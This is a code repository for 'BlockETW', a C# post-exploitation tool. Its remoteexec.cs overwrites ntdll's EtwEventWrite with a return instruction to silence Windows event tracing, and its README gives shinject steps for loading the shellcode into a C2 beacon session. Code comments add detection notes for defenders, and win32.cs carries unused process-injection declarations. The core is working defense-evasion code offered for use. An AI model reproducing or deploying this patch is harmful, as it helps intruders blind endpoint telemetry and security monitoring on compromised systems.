├── README.md ├── blocketw.bin ├── blocketw.sln └── blocketw ├── App.config ├── Properties └── AssemblyInfo.cs ├── bin └── Release │ ├── blocketw.exe.config │ └── blocketw.pdb ├── blocketw.csproj ├── obj ├── Debug │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── blocketw.csproj.CoreCompileInputs.cache │ ├── blocketw.csproj.FileListAbsolute.txt │ └── blocketw.csprojAssemblyReference.cache └── Release │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── blocketw.csproj.CoreCompileInputs.cache │ ├── blocketw.csproj.FileListAbsolute.txt │ ├── blocketw.csprojAssemblyReference.cache │ ├── blocketw.exe │ └── blocketw.pdb ├── remoteexec.cs └── win32.cs /README.md: -------------------------------------------------------------------------------- 1 | # BlockETW 2 | .Net 3.5 / 4.5 Assembly to block ETW telemetry in a process 3 | 4 | You must "Self-Inject" the blocketw.bin to the session that your beacon lives in 5 | 6 | For injecting into a process: 7 | 8 | > shinject /opt/shellcode/blocketw.bin 9 | 10 | There is no output currently for the command. 11 | It WILL NOT WORK if you're using spawnto 12 | 13 | Credits go to RastaMouse and XPN for creating SharpC2, on which this tool is based, 14 | and their research on ETW bypassing. 
15 | 16 | Release Build is built with .net 4.5 (but can be built for 3.5) 17 | 18 | https://rastamouse.me/2020/05/sharpc2/ 19 | 20 | https://blog.xpnsec.com/hiding-your-dotnet-etw/ 21 | -------------------------------------------------------------------------------- /blocketw.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Soledge/BlockEtw/c9e906f508d3b34030b78430b20b4c27059a0f95/blocketw.bin -------------------------------------------------------------------------------- /blocketw.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30011.22 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "blocketw", "blocketw\blocketw.csproj", "{DAEDF7B3-8262-4892-ADC4-425DD5F85BCA}" 7 | EndProject 8 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{C5663DE9-FE2B-4AC3-B558-DB5493E2B013}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|Any CPU = Debug|Any CPU 13 | Release|Any CPU = Release|Any CPU 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {DAEDF7B3-8262-4892-ADC4-425DD5F85BCA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {DAEDF7B3-8262-4892-ADC4-425DD5F85BCA}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {DAEDF7B3-8262-4892-ADC4-425DD5F85BCA}.Release|Any CPU.ActiveCfg = Release|Any CPU 19 | {DAEDF7B3-8262-4892-ADC4-425DD5F85BCA}.Release|Any CPU.Build.0 = Release|Any CPU 20 | EndGlobalSection 21 | GlobalSection(SolutionProperties) = preSolution 22 | HideSolutionNode = FALSE 23 | EndGlobalSection 24 | GlobalSection(ExtensibilityGlobals) = postSolution 25 | SolutionGuid = {8CB560AB-5DA9-459C-9A68-1CFFB9E47644} 26 | EndGlobalSection 27 | EndGlobal 28 | 
-------------------------------------------------------------------------------- /blocketw/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /blocketw/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("blocketw")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("blocketw")] 13 | [assembly: AssemblyCopyright("Copyright © 2020")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 
20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("daedf7b3-8262-4892-adc4-425dd5f85bca")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /blocketw/bin/Release/blocketw.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /blocketw/bin/Release/blocketw.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Soledge/BlockEtw/c9e906f508d3b34030b78430b20b4c27059a0f95/blocketw/bin/Release/blocketw.pdb -------------------------------------------------------------------------------- /blocketw/blocketw.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {DAEDF7B3-8262-4892-ADC4-425DD5F85BCA} 8 | Exe 9 | blocketw 10 | blocketw 11 | v4.5 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- 
/blocketw/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Soledge/BlockEtw/c9e906f508d3b34030b78430b20b4c27059a0f95/blocketw/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /blocketw/obj/Debug/blocketw.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | aae4c9f81314836088327f55a1518e38da65236e 2 | -------------------------------------------------------------------------------- /blocketw/obj/Debug/blocketw.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\obj\Debug\blocketw.csprojAssemblyReference.cache 2 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\obj\Debug\blocketw.csproj.CoreCompileInputs.cache 3 | -------------------------------------------------------------------------------- /blocketw/obj/Debug/blocketw.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Soledge/BlockEtw/c9e906f508d3b34030b78430b20b4c27059a0f95/blocketw/obj/Debug/blocketw.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /blocketw/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Soledge/BlockEtw/c9e906f508d3b34030b78430b20b4c27059a0f95/blocketw/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /blocketw/obj/Release/blocketw.csproj.CoreCompileInputs.cache: 
-------------------------------------------------------------------------------- 1 | d2e766d0d31a60a2b8795266bd5415e2f714c314 2 | -------------------------------------------------------------------------------- /blocketw/obj/Release/blocketw.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\bin\Release\blocketw.pdb 2 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\obj\Release\blocketw.csprojAssemblyReference.cache 3 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\obj\Release\blocketw.csproj.CoreCompileInputs.cache 4 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\obj\Release\blocketw.pdb 5 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\bin\Release\blocketw.exe.config 6 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\bin\Release\blocketw.exe 7 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\obj\Release\blocketw.exe 8 | -------------------------------------------------------------------------------- /blocketw/obj/Release/blocketw.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Soledge/BlockEtw/c9e906f508d3b34030b78430b20b4c27059a0f95/blocketw/obj/Release/blocketw.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /blocketw/obj/Release/blocketw.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Soledge/BlockEtw/c9e906f508d3b34030b78430b20b4c27059a0f95/blocketw/obj/Release/blocketw.exe -------------------------------------------------------------------------------- /blocketw/obj/Release/blocketw.pdb: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Soledge/BlockEtw/c9e906f508d3b34030b78430b20b4c27059a0f95/blocketw/obj/Release/blocketw.pdb
--------------------------------------------------------------------------------
/blocketw/remoteexec.cs:
--------------------------------------------------------------------------------
using System;
using System.Diagnostics;
using Agent.PInvoke;

namespace Agent.Execution
{
    /// <summary>
    /// Program entry type. Despite the name, nothing here touches a remote
    /// process: the only target is the process this assembly is running in.
    /// </summary>
    internal class RemoteExecution
    {
        /// <summary>
        /// Overwrites the first byte of ntdll!EtwEventWrite in the current
        /// process with 0xC3 (the x86/x64 <c>ret</c> opcode), so every call
        /// into that export returns immediately and no ETW event is emitted
        /// through it from this process (the README calls this "blocking ETW
        /// telemetry in a process").
        /// </summary>
        /// <param name="args">Unused.</param>
        /// <remarks>
        /// Defender notes. The patch lives only in this process's mapped copy
        /// of ntdll; the on-disk image is not modified and other processes are
        /// unaffected, which is consistent with the README's warning that it
        /// does not work with spawnto. The three-call sequence below is the
        /// characteristic signal of this technique: a protection change to
        /// 0x40 (PAGE_EXECUTE_READWRITE, see AllocationProtect in win32.cs)
        /// on a page inside ntdll's code, a one-byte write to an exported
        /// function, then restoration of the previous protection. Comparing
        /// the in-memory prologue of EtwEventWrite against the on-disk ntdll,
        /// or alerting on RWX protection changes over ntdll's text section,
        /// detects it after the fact. None of the native return values are
        /// examined, so any failure is silent (the README notes the command
        /// produces no output).
        /// </remarks>
        public static void Main(string[] args)
        {
            // Handle of the running process itself; this is where the patch is applied.
            var hProcess = Process.GetCurrentProcess().Handle;

            // One-byte patch: 0xC3 == ret.
            var hook = new byte[] { 0xc3 };
            // ntdll.dll is already mapped in every Windows process, so LoadLibrary
            // resolves to the existing module; GetProcAddress then yields the
            // address of the exported EtwEventWrite function.
            var address = Win32.Kernel32.GetProcAddress(Win32.Kernel32.LoadLibrary("ntdll.dll"), "EtwEventWrite");

            // 0x40 == PAGE_EXECUTE_READWRITE (AllocationProtect in win32.cs):
            // makes the code page containing the export writable. Return value ignored.
            Win32.Kernel32.VirtualProtectEx(hProcess, address, (UIntPtr)hook.Length, 0x40, out uint oldProtect);
            // Writes the single ret byte over the function's first instruction.
            // bytesWritten is never inspected. Return value ignored.
            Win32.Kernel32.WriteProcessMemory(hProcess, address, hook, hook.Length, out IntPtr bytesWritten);
            // Restores the protection captured above; `x` receives the interim
            // protection and is discarded. Return value ignored.
            Win32.Kernel32.VirtualProtectEx(hProcess, address, (UIntPtr)hook.Length, oldProtect, out uint x);
        }
    }
}
--------------------------------------------------------------------------------
/blocketw/win32.cs:
--------------------------------------------------------------------------------
using System;
using System.Text;
using System.Runtime.InteropServices;

namespace Agent.PInvoke
{
    /// <summary>
    /// P/Invoke surface. Of everything declared here, remoteexec.cs (the only
    /// other source file in this repository) calls just
    /// <see cref="Kernel32.LoadLibrary"/>, <see cref="Kernel32.GetProcAddress"/>,
    /// <see cref="Kernel32.VirtualProtectEx"/> and
    /// <see cref="Kernel32.WriteProcessMemory"/>. The remaining imports, structs
    /// and enums are carried over from the larger agent codebase the README
    /// credits (SharpC2) and are not referenced by this project. Native
    /// signatures are as the original author declared them and have not been
    /// re-verified against the Windows headers here.
    /// </summary>
    internal class Win32
    {
        /// <summary>kernel32.dll imports. See the class-level note for which are used.</summary>
        internal class Kernel32
        {
            // Unused in this project.
            [DllImport("kernel32.dll")]
            internal static extern bool CreatePipe(out IntPtr hReadPipe, out IntPtr hWritePipe, ref SECURITY_ATTRIBUTES lpPipeAttributes, uint nSize);

            // Unused in this project.
            [DllImport("kernel32.dll", SetLastError = true)]
            internal static extern bool SetHandleInformation(IntPtr hObject, HANDLE_FLAGS dwMask, HANDLE_FLAGS dwFlags);

            // Unused in this project.
            [DllImport("kernel32.dll", SetLastError = true)]
            internal static extern bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize);

            // Unused in this project.
            [DllImport("kernel32.dll", SetLastError = true)]
            internal static extern bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize);

            // Unused in this project.
            [DllImport("kernel32.dll", SetLastError = true)]
            internal static extern IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId);

            // Unused in this project.
            [DllImport("kernel32.dll", SetLastError = true)]
            [return: MarshalAs(UnmanagedType.Bool)]
            internal static extern bool DuplicateHandle(IntPtr hSourceProcessHandle, IntPtr hSourceHandle, IntPtr hTargetProcessHandle, ref IntPtr lpTargetHandle, uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, uint dwOptions);

            // Unused in this project.
            [DllImport("kernel32.dll")]
            [return: MarshalAs(UnmanagedType.Bool)]
            internal static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);

            // Unused in this project.
            [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            internal static extern int GetConsoleOutputCP();

            // Unused in this project.
            [DllImport("kernel32.dll", SetLastError = true)]
            internal static extern bool PeekNamedPipe(IntPtr handle, IntPtr buffer, IntPtr nBufferSize, IntPtr bytesRead, ref uint bytesAvail, IntPtr BytesLeftThisMessage);

            // Unused in this project.
            [DllImport("kernel32.dll", SetLastError = true)]
            internal static extern uint WaitForSingleObject(IntPtr handle, uint milliseconds);

            // Unused in this project.
            [DllImport("kernel32.dll", SetLastError = true)]
            internal static extern bool DeleteProcThreadAttributeList(IntPtr lpAttributeList);

            // Unused in this project.
            [DllImport("kernel32.dll", SetLastError = true)]
            internal static extern bool CloseHandle(IntPtr hObject);

            // Unused in this project.
            [DllImport("kernel32.dll")]
            internal static extern void RtlZeroMemory(IntPtr pBuffer, int length);

            // Unused in this project.
            [DllImport("kernel32.dll")]
            internal static extern Boolean ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, UInt32 dwSize, ref UInt32 lpNumberOfBytesRead);

            // Unused in this project.
            [DllImport("kernel32.dll")]
            internal static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, int flAllocationType, int flProtect);

            // Used by remoteexec.cs to write the one-byte patch into this process.
            [DllImport("kernel32.dll", SetLastError = true)]
            internal static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);

            // Used by remoteexec.cs to flip the target page to 0x40 and back.
            // flNewProtect is a raw uint; the AllocationProtect enum below names the values.
            [DllImport("kernel32.dll")]
            internal static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

            // Unused in this project.
            [DllImport("kernel32.dll", SetLastError = true)]
            internal static extern bool QueryFullProcessImageName([In]IntPtr hProcess, [In]int dwFlags, [Out]StringBuilder lpExeName, ref int lpdwSize);

            // Unused in this project.
            [DllImport("kernel32.dll")]
            internal static extern UInt32 ResumeThread(IntPtr hThread);

            // Used by remoteexec.cs to resolve the address of EtwEventWrite.
            [DllImport("kernel32")]
            public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

            // Used by remoteexec.cs to obtain the module handle of ntdll.dll.
            [DllImport("kernel32")]
            public static extern IntPtr LoadLibrary(string name);
        }

        /// <summary>
        /// ntdll.dll imports. None of these are referenced anywhere in this
        /// project; they are inherited declarations (see the class-level note).
        /// </summary>
        internal class Ntdll
        {
            [DllImport("ntdll.dll")]
            internal static extern UInt32 NtQueryInformationProcess(IntPtr processHandle, UInt32 processInformationClass, ref ulong processInformation, int processInformationLength, ref UInt32 returnLength);

            [DllImport("ntdll.dll")]
            internal static extern UInt32 RtlCreateProcessParametersEx(ref IntPtr pProcessParameters, IntPtr ImagePathName, IntPtr DllPath, IntPtr CurrentDirectory, IntPtr CommandLine, IntPtr Environment, IntPtr WindowTitle, IntPtr DesktopInfo, IntPtr ShellInfo, IntPtr RuntimeData, uint Flags);

            [DllImport("ntdll.dll")]
            internal static extern UInt32 NtOpenProcess(ref IntPtr ProcessHandle, UInt32 DesiredAccess, ref OBJECT_ATTRIBUTES ObjectAttributes, ref CLIENT_ID ClientId);

            [DllImport("ntdll.dll")]
            internal static extern UInt32 NtCreateSection(
                ref IntPtr section,
                UInt32 desiredAccess,
                IntPtr pAttrs,
                ref long MaxSize,
                uint pageProt,
                uint allocationAttribs,
                IntPtr hFile);

            [DllImport("ntdll.dll")]
            internal static extern UInt32 NtMapViewOfSection(
                IntPtr SectionHandle,
                IntPtr ProcessHandle,
                ref IntPtr BaseAddress,
                IntPtr ZeroBits,
                IntPtr CommitSize,
                ref long SectionOffset,
                ref long ViewSize,
                uint InheritDisposition,
                uint AllocationType,
                uint Win32Protect);

            [DllImport("ntdll.dll")]
            internal static extern void RtlInitUnicodeString(
                ref UNICODE_STRING DestinationString,
                [MarshalAs(UnmanagedType.LPWStr)]
                string SourceString);

            [DllImport("ntdll.dll")]
            internal static extern UInt32 LdrGetDllHandle(
                IntPtr DllPath,
                IntPtr DllCharacteristics,
                ref UNICODE_STRING DllName,
                ref IntPtr DllHandle);

            [DllImport("ntdll.dll")]
            internal static extern UInt32 RtlUnicodeStringToAnsiString(
                ref ANSI_STRING DestinationString,
                ref UNICODE_STRING SourceString,
                bool AllocateDestinationString);

            [DllImport("ntdll.dll")]
            internal static extern UInt32 LdrGetProcedureAddress(
                IntPtr hModule,
                ref ANSI_STRING ModName,
                UInt32 Ordinal,
                ref IntPtr FunctionAddress);

            [DllImport("ntdll.dll")]
            internal static extern UInt32 NtCreateThreadEx(
                ref IntPtr hThread,
                UInt32 DesiredAccess,
                IntPtr ObjectAttributes,
                IntPtr ProcessHandle,
                IntPtr lpStartAddress,
                IntPtr lpParameter,
                bool CreateSuspended,
                UInt32 StackZeroBits,
                UInt32 SizeOfStackCommit,
                UInt32 SizeOfStackReserve,
                IntPtr lpBytesBuffer);

            [DllImport("ntdll.dll")]
            internal static extern UInt32 NtQueueApcThread(
                IntPtr ThreadHandle,
                IntPtr ApcRoutine,
                IntPtr ApcArgument1,
                IntPtr ApcArgument2,
                IntPtr ApcArgument3);

            [DllImport("ntdll.dll")]
            internal static extern UInt32 NtAlertResumeThread(
                IntPtr ThreadHandle,
                ref UInt32 PreviousSuspendCount);

            [DllImport("ntdll.dll")]
            internal static extern UInt32 NtQueryInformationThread(
                IntPtr ThreadHandle,
                int ThreadInformationClass,
                IntPtr ThreadInformation,
                int ThreadInformationLength,
                ref int ReturnLength);

            [DllImport("ntdll.dll")]
            public static extern UInt32 NtUnmapViewOfSection(
                IntPtr ProcessHandle,
                IntPtr BaseAddress);
        }

        // The structs below are only referenced by the unused imports above.
        // Field order and types are the declaring author's; they are marshaled
        // as laid out here, so none were reordered.

        [StructLayout(LayoutKind.Sequential)]
        internal struct PROCESS_INFORMATION
        {
            internal IntPtr hProcess;
            internal IntPtr hThread;
            internal int dwProcessId;
            internal int dwThreadId;
        }

        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        internal struct STARTUPINFO
        {
            internal Int32 cb;
            internal string lpReserved;
            internal string lpDesktop;
            internal string lpTitle;
            internal Int32 dwX;
            internal Int32 dwY;
            internal Int32 dwXSize;
            internal Int32 dwYSize;
            internal Int32 dwXCountChars;
            internal Int32 dwYCountChars;
            internal Int32 dwFillAttribute;
            internal Int32 dwFlags;
            internal Int16 wShowWindow;
            internal Int16 cbReserved2;
            internal IntPtr lpReserved2;
            internal IntPtr hStdInput;
            internal IntPtr hStdOutput;
            internal IntPtr hStdError;
        }

        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        internal struct STARTUPINFOEX
        {
            internal STARTUPINFO StartupInfo;
            internal IntPtr lpAttributeList;
        }

        [StructLayout(LayoutKind.Sequential)]
        internal struct SECURITY_ATTRIBUTES
        {
            internal int nLength;
            internal IntPtr lpSecurityDescriptor;
            [MarshalAs(UnmanagedType.Bool)]
            internal bool bInheritHandle;
        }

        [StructLayout(LayoutKind.Sequential)]
        internal struct PROCESS_BASIC_INFORMATION
        {
            internal IntPtr ExitStatus;
            internal IntPtr PebBaseAddress;
            internal IntPtr AffinityMask;
            internal IntPtr BasePriority;
            internal UIntPtr UniqueProcessId;
            internal IntPtr InheritedFromUniqueProcessId;
        }

        // Declared as a class (reference type) rather than a struct, unlike its siblings;
        // kept as-is since it changes how it would be marshaled.
        [StructLayout(LayoutKind.Sequential)]
        internal class THREAD_BASIC_INFORMATION
        {
            internal UInt32 ExitStatus;
            internal IntPtr TebBaseAddress;
            internal CLIENT_ID ClientId;
            internal UIntPtr AffinityMask;
            internal int Priority;
            internal int BasePriority;
        }

        [StructLayout(LayoutKind.Sequential)]
        internal struct UNICODE_STRING
        {
            internal UInt16 Length;
            internal UInt16 MaximumLength;
            internal IntPtr Buffer;
        }

        [StructLayout(LayoutKind.Sequential)]
        internal struct ANSI_STRING
        {
            internal UInt16 Length;
            internal UInt16 MaximumLength;
            internal IntPtr Buffer;
        }

        [StructLayout(LayoutKind.Sequential, Pack = 0)]
        internal struct OBJECT_ATTRIBUTES
        {
            internal Int32 Length;
            internal IntPtr RootDirectory;
            internal IntPtr ObjectName;
            internal uint Attributes;
            internal IntPtr SecurityDescriptor;
            internal IntPtr SecurityQualityOfService;
        }

        [StructLayout(LayoutKind.Sequential)]
        internal struct CLIENT_ID
        {
            internal IntPtr UniqueProcess;
            internal IntPtr UniqueThread;
        }

        // Only referenced by the unused OpenProcess import.
        [Flags]
        internal enum ProcessAccessFlags : uint
        {
            All = 0x001F0FFF,
            Terminate = 0x00000001,
            CreateThread = 0x00000002,
            VirtualMemoryOperation = 0x00000008,
            VirtualMemoryRead = 0x00000010,
            VirtualMemoryWrite = 0x00000020,
            DuplicateHandle = 0x00000040,
            CreateProcess = 0x000000080,
            SetQuota = 0x00000100,
            SetInformation = 0x00000200,
            QueryInformation = 0x00000400,
            QueryLimitedInformation = 0x00001000,
            Synchronize = 0x00100000
        }

        // Only referenced by the unused SetHandleInformation import.
        [Flags]
        internal enum HANDLE_FLAGS : uint
        {
            None = 0,
            INHERIT = 1,
            PROTECT_FROM_CLOSE = 2
        }

        // Not referenced in this project.
        [Flags]
        internal enum DuplicateOptions : uint
        {
            DUPLICATE_CLOSE_SOURCE = 0x00000001,
            DUPLICATE_SAME_ACCESS = 0x00000002
        }

        // Page-protection constants. remoteexec.cs passes the raw literal 0x40
        // to VirtualProtectEx rather than this enum; it corresponds to
        // PAGE_EXECUTE_READWRITE below.
        [Flags]
        internal enum AllocationProtect : uint
        {
            NONE = 0x00000000,
            PAGE_EXECUTE = 0x00000010,
            PAGE_EXECUTE_READ = 0x00000020,
            PAGE_EXECUTE_READWRITE = 0x00000040,
            PAGE_EXECUTE_WRITECOPY = 0x00000080,
            PAGE_NOACCESS = 0x00000001,
            PAGE_READONLY = 0x00000002,
            PAGE_READWRITE = 0x00000004,
            PAGE_WRITECOPY = 0x00000008,
            PAGE_GUARD = 0x00000100,
            PAGE_NOCACHE = 0x00000200,
            PAGE_WRITECOMBINE = 0x00000400
        }
    }
}
--------------------------------------------------------------------------------